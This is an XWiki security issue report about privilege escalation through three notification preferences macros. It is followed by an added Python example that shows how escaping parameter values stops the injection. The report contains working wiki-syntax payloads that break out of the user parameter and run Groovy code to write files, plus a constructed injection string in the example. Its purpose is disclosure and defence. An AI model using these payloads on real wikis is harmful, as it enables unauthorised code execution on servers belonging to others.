XWiki Platform
XWIKI-20259

Privilege escalation (PR) from account/view through Notification Preferences Macros


    Description

      Steps to reproduce:
      Add

      {{notificationsFiltersPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit.txt~").withWriter { out -> out.println(~"created from filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}
      
      {{notificationsAutoWatchPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit2.txt~").withWriter { out -> out.println(~"created from auto watch preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}
      
      {{notificationsEmailPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit3.txt~").withWriter { out -> out.println(~"created from email filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}
      

      to any place where wiki syntax is accepted, such as the "about" section of your user profile, as a user without programming or script rights.

      Expected result:

      No file is created.

      Actual result:

      A file /tmp/exploit.txt is created with the content "created from filter preferences!". Similar files are created for the other two macros. This shows a privilege escalation to programming rights. The attack can be executed with just an account that has write access to the user profile, or even with only view rights via CKEditor's HTML converter.
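The reproduction steps above rely on the value of the user parameter being placed inside generated wiki syntax without escaping, so that the escaped quote and closing braces in the value terminate the parameter and the macro and everything that follows is parsed as new macros. The script below is an added illustration of the defensive side and is not XWiki's own code: it builds a macro call from a user-controlled parameter both without and with escaping, and counts the unescaped macro delimiters that a parser would see. It assumes XWiki 2.x syntax where a tilde escapes the following character; the macro name exampleMacro and the injected value are constructed placeholders, and a real fix must use XWiki's own escaping utilities rather than this helper.

```python
# Added example, not XWiki code. Assumes XWiki 2.x syntax: '~' escapes the
# next character, '"' delimits a macro parameter value, '{{' / '}}' delimit
# macros. Everything below is a constructed illustration of the fix principle.

# Characters that can end a quoted parameter value or the macro itself, plus
# the escape character, which must be doubled so it cannot swallow the next char.
_SPECIAL = set('~"{}')


def escape_macro_parameter(value: str) -> str:
    """Escape a string so it stays a literal value inside a double-quoted
    XWiki macro parameter (assumed escaping rule: prefix with '~')."""
    return "".join("~" + c if c in _SPECIAL else c for c in value)


def unsafe_build_macro_call(macro: str, **params: str) -> str:
    """The vulnerable pattern: parameter values concatenated verbatim."""
    rendered = " ".join(f'{k}="{v}"' for k, v in params.items())
    return f"{{{{{macro} {rendered} /}}}}"


def build_macro_call(macro: str, **params: str) -> str:
    """The hardened pattern: every parameter value escaped before insertion."""
    rendered = " ".join(f'{k}="{escape_macro_parameter(v)}"' for k, v in params.items())
    return f"{{{{{macro} {rendered} /}}}}"


def count_macro_markers(markup: str) -> int:
    """Count unescaped '{{' and '}}' sequences the way a syntax parser would,
    honouring '~' as an escape for the character that follows it."""
    count = 0
    i = 0
    while i < len(markup):
        if markup[i] == "~":
            i += 2  # skip the escape and the escaped character
            continue
        if markup[i:i + 2] in ("{{", "}}"):
            count += 1
            i += 2
            continue
        i += 1
    return count


# Constructed value in the same shape as the report's payload: it closes the
# quoted parameter and the macro, opens a new macro, then reopens a quote so
# the trailing '" /}}' added by the builder still parses.
INJECTED_USER = '" /}} {{groovy}}println(1){{/groovy}} {{dummy a="'


def marker_counts():
    """Return (unsafe, safe) counts of macro delimiters a parser would see."""
    unsafe = count_macro_markers(unsafe_build_macro_call("exampleMacro", user=INJECTED_USER))
    safe = count_macro_markers(build_macro_call("exampleMacro", user=INJECTED_USER))
    return unsafe, safe


if __name__ == "__main__":
    unsafe, safe = marker_counts()
    print("unescaped delimiters, unsafe build:", unsafe)  # four macros' worth
    print("unescaped delimiters, safe build:  ", safe)    # the single intended macro
    print(build_macro_call("exampleMacro", user=INJECTED_USER))
```

The unsafe builder yields eight unescaped delimiters, i.e. four macro invocations where one was intended; the escaped builder yields exactly two, the opening and closing of the intended macro, and the injected text survives only as literal parameter content. When reviewing macros that generate wiki syntax, this is the property to check: the number of macro boundaries in the output must not depend on user input.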

            People

              MichaelHamann Michael Hamann